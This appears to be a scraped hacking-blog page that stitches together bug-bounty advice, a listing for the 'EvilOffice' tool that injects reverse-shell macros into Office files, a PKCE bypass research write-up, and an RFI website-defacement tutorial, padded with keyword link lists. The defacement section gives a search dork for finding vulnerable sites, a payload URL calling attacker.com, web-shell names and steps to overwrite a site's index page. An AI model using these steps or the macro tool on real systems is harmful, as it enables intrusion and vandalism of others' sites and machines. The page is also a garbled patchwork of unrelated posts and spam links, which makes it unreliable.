How Do I Get Started With Bug Bounty ?

How do I get started with bug bounty hunting? How do I improve my skills?



These are some simple steps that every bug bounty hunter can use to get started and improve their skills:

Learn to make it; then break it!
A major chunk of the hacker's mindset consists of wanting to learn more. In order to really exploit issues and discover further potential vulnerabilities, hackers are encouraged to learn to build what they are targeting. By doing this, there is a greater likelihood that hacker will understand the component being targeted and where most issues appear. For example, when people ask me how to take over a sub-domain, I make sure they understand the Domain Name System (DNS) first and let them set up their own website to play around attempting to "claim" that domain.

Read books. Lots of books.
One way to get better is by reading fellow hunters' and hackers' write-ups. Follow /r/netsec and Twitter for fantastic write-ups ranging from a variety of security-related topics that will not only motivate you but help you improve. For a list of good books to read, please refer to "What books should I read?".

Join discussions and ask questions.
As you may be aware, the information security community is full of interesting discussions ranging from breaches to surveillance, and further. The bug bounty community consists of hunters, security analysts, and platform staff helping one and another get better at what they do. There are two very popular bug bounty forums: Bug Bounty Forum and Bug Bounty World.

Participate in open source projects; learn to code.
Go to https://github.com/explore or https://gitlab.com/explore/projects and pick a project to contribute to. By doing so you will improve your general coding and communication skills. On top of that, read https://learnpythonthehardway.org/ and https://linuxjourney.com/.

Help others. If you can teach it, you have mastered it.
Once you discover something new and believe others would benefit from learning about your discovery, publish a write-up about it. Not only will you help others, you will learn to really master the topic because you can actually explain it properly.

Smile when you get feedback and use it to your advantage.
The bug bounty community is full of people wanting to help others so do not be surprised if someone gives you some constructive feedback about your work. Learn from your mistakes and in doing so use it to your advantage. I have a little physical notebook where I keep track of the little things that I learnt during the day and the feedback that people gave me.


Learn to approach a target.
The first step when approaching a target is always going to be reconnaissance — preliminary gathering of information about the target. If the target is a web application, start by browsing around like a normal user and get to know the website's purpose. Then you can start enumerating endpoints such as sub-domains, ports and web paths.

A woodsman was once asked, "What would you do if you had just five minutes to chop down a tree?" He answered, "I would spend the first two and a half minutes sharpening my axe."
As you progress, you will start to notice patterns and find yourself refining your hunting methodology. You will probably also start automating a lot of the repetitive tasks.

More info

• Hacker Software
• Pentest Tools
• Hacking Forums
• Pentest Tools Github
• Pentest Free
• Hacking Forums
• Pentest With Kali
• Pentest Lab Setup

Memcrashed DDoS Exploit | Install | Github

Related news

1. Pentest With Kali Linux
2. Hacking Games Online
3. Pentest Smtp
4. Pentestlab
5. Hacking Network
6. Hacker Ethic
7. Pentest Jobs
8. Pentest Box
9. Hacking Meaning
10. Pentest Azure

Eviloffice - Inject Macro And DDE Code Into Excel And Word Documents (Reverse Shell)

Win python script to inject Macro and DDE code into Excel and Word documents (reverse shell)

Features:

• Inject malicious Macro on formats: docm, dotm, xlsm, xltm
• Inject malicious DDE code on formats: doc, docx, dot, xls, xlsx, xlt, xltx
• Python2/Python3 Compatible

Tested: Win10 (MS Office 14.0)

Requirements:

• Microsoft Office (Word/Excel)
• pywin32: python -m pip install -r requirements.txt

Forwarding requirements:

• Ngrok Authtoken (for TCP Tunneling): Sign up at: https://ngrok.com/signup
• Your authtoken is available on your dashboard: https://dashboard.ngrok.com
• Install your auhtoken: ./ngrok authtoken <YOUR_AUTHTOKEN>

Legal disclaimer:
Usage of EvilOffice for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

Usage:

git clone https://github.com/thelinuxchoice/eviloffice
cd eviloffice
python -m pip install -r requirements.txt
python eviloffice.py

Author: github.com/thelinuxchoice/eviloffice
Twitter: twitter.com/linux_choice

Download Eviloffice

via KitPloit

This article is the property of Tenochtitlan Offensive Security. Verlo Completo --> https://tenochtitlan-sec.blogspot.com

Related posts

• Pentest+ Vs Ceh
• Pentest Active Directory
• Pentest Tools Free
• Pentest Box
• Pentest Guide
• Hacking Linux
• Hackerrank Sql
• Pentest Cyber Security
• Pentest Certification
• Pentest Tutorial
• Hacking Wifi
• Pentest News
• Pentest Lab Setup
• Pentest
• Hacking Ethics
• Pentest With Metasploit
• Pentest Wiki
• Pentest Lab Setup

PKCE: What Can(Not) Be Protected

This post is about PKCE [RFC7636], a protection mechanism for OAuth and OpenIDConnect designed for public clients to detect the authorization code interception attack.

At the beginning of our research, we wrongly believed that PKCE protects mobile and native apps from the so called „App Impersonation" attacks. Considering our ideas and after a short discussion with the authors of the PKCE specification, we found out that PKCE does not address this issue.

In other words, the protection of PKCE can be bypassed on public clients (mobile and native apps) by using a maliciously acting app.

OAuth Code Flow

In Figure 1, we briefly introduce how the OAuth flow works on mobile apps and show show the reason why we do need PKCE.
In our example the user has two apps installed on the mobile phone: an Honest App and an Evil App. We assume that the Evil App is able to register the same handler as the Honest App and thus intercept messages sent to the Honest App. If you are more interested in this issue, you can find more information here [1].

Figure 1: An example of the "authorization code interception" attack on mobile devices. 

Step 1: A user starts the Honest App and initiates the authentication via OpenID Connect or the authorization via OAuth. Consequentially, the Honest App generates an Auth Request containing the OpenID Connect/OAuth parameters: client_id, state, redirect_uri, scope, authorization_grant, nonce, …. 

Step 2: The Browser is called and the Auth Request is sent to the Authorization Server (usually Facebook, Google, …).

• The Honest App could use a Web View browser. However, the current specification clearly advice to use the operating system's default browser and avoid the usage of Web Views [2]. In addition, Google does not allow the usage of Web View browser since August 2016 [3].

Step 3: We asume that the user is authenticated and he authorizes the access to the requested resources. As a result, the Auth Response containing the code is sent back to the browser.

Step 4: Now, the browser calls the Honest App registered handler. However, the Evil App is registered on this handler too and receives the code.

Step 5: The Evil App sends the stolen code to the Authorization Server and receives the corresponding access_token in step 6. Now, the Evil App can access the authorized ressources.

• Optionally, in step 5 the App can authenticate on the Authorization Server via client_id, client_secret. Since, Apps are public clients they do not have any protection mechanisms regarding the storage of this information. Thus, an attacker can easy get this information and add it to the Evil App.

Proof Key for Code Exchange - PKCE (RFC 7636)

Now, let's see how PKCE does prevent the attack. The basic idea of PKCE is to bind the Auth Request in Step 1 to the code redemption in Step 5. In other words, only the app generated the Auth Request is able to redeem the generated code.

Figure 2: PKCE - RFC 7636 

Step 1: The Auth Request is generated as previosly described. Additionally, two parameters are added:

• The Honest App generates a random string called code_verifier
• The Honest App computes the code_challenge=SHA-256(code_verifier)
• The Honest App specifies the challenge_method=SHA256

Step 2: The Authorization Server receives the Auth Request and binds the code to the received code_challenge and challenge_method.

• Later in Step 5, the Authorzation Server expects to receive the code_verifier. By comparing the SHA-256(code_verifier) value with the recieved code_challenge, the Authorization Server verifies that the sender of the Auth Request ist the same as the sender of the code.

Step 3-4: The code leaks again to the Evil App.

Step 5: Now, Evil App must send the code_verifier together with the code. Unfortunatelly, the App does not have it and is not able to compute it. Thus, it cannot redeem the code.

 PKCE Bypass via App Impersonation

Again, PKCE binds the Auth Request to the coderedemption.

The question rises, if an Evil App can build its own Auth Request with its own code_verifier, code_challenge and challenge_method.The short answer is – yes, it can.

Figure 3: Bypassing PKCE via the App Impersonation attack

Step 1: The Evil App generates an Auth Request. The Auth Request contains the client_id and redirect_uri of the Honest App. Thus, the User and the Authorization Server cannot recognize that the Evil App initiates this request. 

Step 2-4: These steps do not deviate from the previous description in Figure 2.

Step 5: In Step 5 the Evil App sends the code_verifier used for the computation of the code_challenge. Thus, the stolen code can be successfully redeemed and the Evil App receives the access_token and id_token.

OAuth 2.0 for Native Apps

The attack cannot be prevented by PKCE. However, the IETF working group is currently working on a Draft describing recommendations for using OAuth 2.0 for native apps.

References

[1] http://mews.sv.cmu.edu/papers/ccs-14.pdf

[2] https://tools.ietf.org/html/draft-ietf-oauth-native-apps-06#section-8.1

[3] https://developers.googleblog.com/2016/08/modernizing-oauth-interactions-in-native-apps.html

Authors

Vladislav Mladenov
Christian Mainka (@CheariX)

Related word

• Hacking Attack
• Hacking Process
• Pentest Dns Server
• Hacker Ethic
• Pentest Wiki
• Pentest Stages
• Pentestmonkey Cheat Sheet
• Hacking Process
• Hacking Site
• Hacking Images
• Pentest Kit
• How To Pentest A Website With Kali
• Pentesterlab
• Hacker On Computer
• Pentest Methodology
• Pentest Bootcamp

HOW TO DEFACE A WEBSITE USING REMOTE FILE INCLUSION (RFI)?

HOW TO DEFACE A WEBSITE USING REMOTE FILE INCLUSION (RFI)?

Remote File Inclusion (RFI) is a technique that allows the attacker to upload a malicious code or file on a website or server. The vulnerability exploits the different sort of validation checks in a website and can lead to code execution on server or code execution on the website. This time, I will be writing a simple tutorial on Remote File Inclusion and by the end of the tutorial, I suppose you will know what it is all about and may be able to deploy an attack.

RFI is a common vulnerability. All the website hacking is not exactly about SQL injection. Using RFI you can literally deface the websites, get access to the server and play almost anything with the server. Why it put a red alert to the websites, just because of that you only need to have your common sense and basic knowledge of PHP to execute malicious code. BASH might come handy as most of the servers today are hosted on Linux.

SO, HOW TO HACK A WEBSITE OR SERVER WITH RFI?

First of all, we need to find out an RFI vulnerable website. Let's see how we can find one.

As we know finding a vulnerability is the first step to hack a website or server. So, let's get started and simply go to Google and search for the following query.

inurl: "index.php?page=home"

At the place of home, you can also try some other pages like products, gallery and etc.

If you already a know RFI vulnerable website, then you don't need to find it through Google.

Once we have found it, let's move on to the next step. Let's see we have a following RFI vulnerable website.

http://target.com/index.php?page=home

As you can see, this website pulls documents stored in text format from the server and renders them as web pages. Now we can use PHP include function to pull them out. Let's see how it works.

http://target.com/index.php?page=http://attacker.com/maliciousScript.txt

I have included my malicious code txt URL at the place of home. You can use any shell for malicious scripts like c99, r57 or any other.

Now, if it's a really vulnerable website, then there would be 3 things that can happen.

1. You might have noticed that the URL consisted of "page=home" had no extension, but I have included an extension in my URL, hence the site may give an error like 'failure to include maliciousScript.txt', this might happen as the site may be automatically adding the .txt extension to the pages stored in server.
2. In case, it automatically appends something in the lines of .php then we have to use a null byte '' in order to avoid error.
3. Successful execution.

As we get the successful execution of the code, we're good to go with the shell. Now we'll browse the shell for index.php. And will replace the file with our deface page.

More information

1. Pentest Web Application
2. Pentest Open Source
3. Hacking Site
4. Pentest Process
5. Pentest Free
6. Hacking With Raspberry Pi
7. Pentest Devices
8. Pentest Software